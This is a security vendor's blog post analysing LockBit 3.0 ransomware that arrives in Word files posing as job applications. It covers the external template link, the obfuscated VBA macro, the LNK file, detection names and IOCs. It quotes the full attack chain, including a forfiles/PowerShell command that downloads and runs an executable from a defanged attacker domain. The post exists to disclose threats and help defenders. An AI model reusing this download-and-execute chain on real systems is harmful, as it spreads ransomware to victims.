The ASEC analysis team has identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases.
There is an external link in the word\_rels\settings.xml.rels file inside the Word document. When the document file is executed through this, the user PC accesses hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm and downloads an additional dotm file.
Figure 1. settings.xml.rels
Figure 2. URL access screen when the Word document is executedThe document file contains an image that prompts the use of a macro script. The downloaded dlx5rc.dotm contains a VBA macro, and when the user clicks Enable Content, the malicious macro script is executed.
Figure 3. Word File
Figure 4. Document propertiesThe VBA macro code inside the dotm file is as follows.
Figure 5. Malicious VBA macro codeThe strings in the code are obfuscated and use CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8). When the VBA macro is executed, it creates a file named skeml.lnk in the C:\Users\Public\ folder. The TargetPath of the link file is forfiles.exe, which is executed through rundll32.exe. The command that executes the link file is as follows.
- rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk
When the link file is executed, additional malicious files are downloaded from hxxp://ppaauuaa11232[.]cc/aaa.exe via PowerShell commands and then saved in C:\Users\Public\156498415616651651984561561658456.exe before being executed. The command executed via the LNK file is as follows.
- forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”
Figure 6. RAPIT process treeThe currently downloaded 156498415616651651984561561658456.exe file is LockBit 3.0 ransomware in NSIS form.
Figure 7. Desktop after ransomware infectionAs LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.
[File Detection]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit
[Behavior Detection]
Malware/MDP.Download.M1197
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171
[IOC Info]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post <strong>LockBit 3.0 Ransomware Distributed via Word Documents</strong> appeared first on ASEC BLOG.
Article Link: LockBit 3.0 Ransomware Distributed via Word Documents - ASEC BLOG